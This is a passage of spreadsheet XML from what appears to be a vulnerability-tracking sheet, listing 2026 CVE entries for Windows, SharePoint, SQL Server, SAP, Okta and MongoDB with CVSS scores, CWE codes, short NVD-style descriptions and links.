      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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05" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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06" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S207"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T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S209"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T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S210"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T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
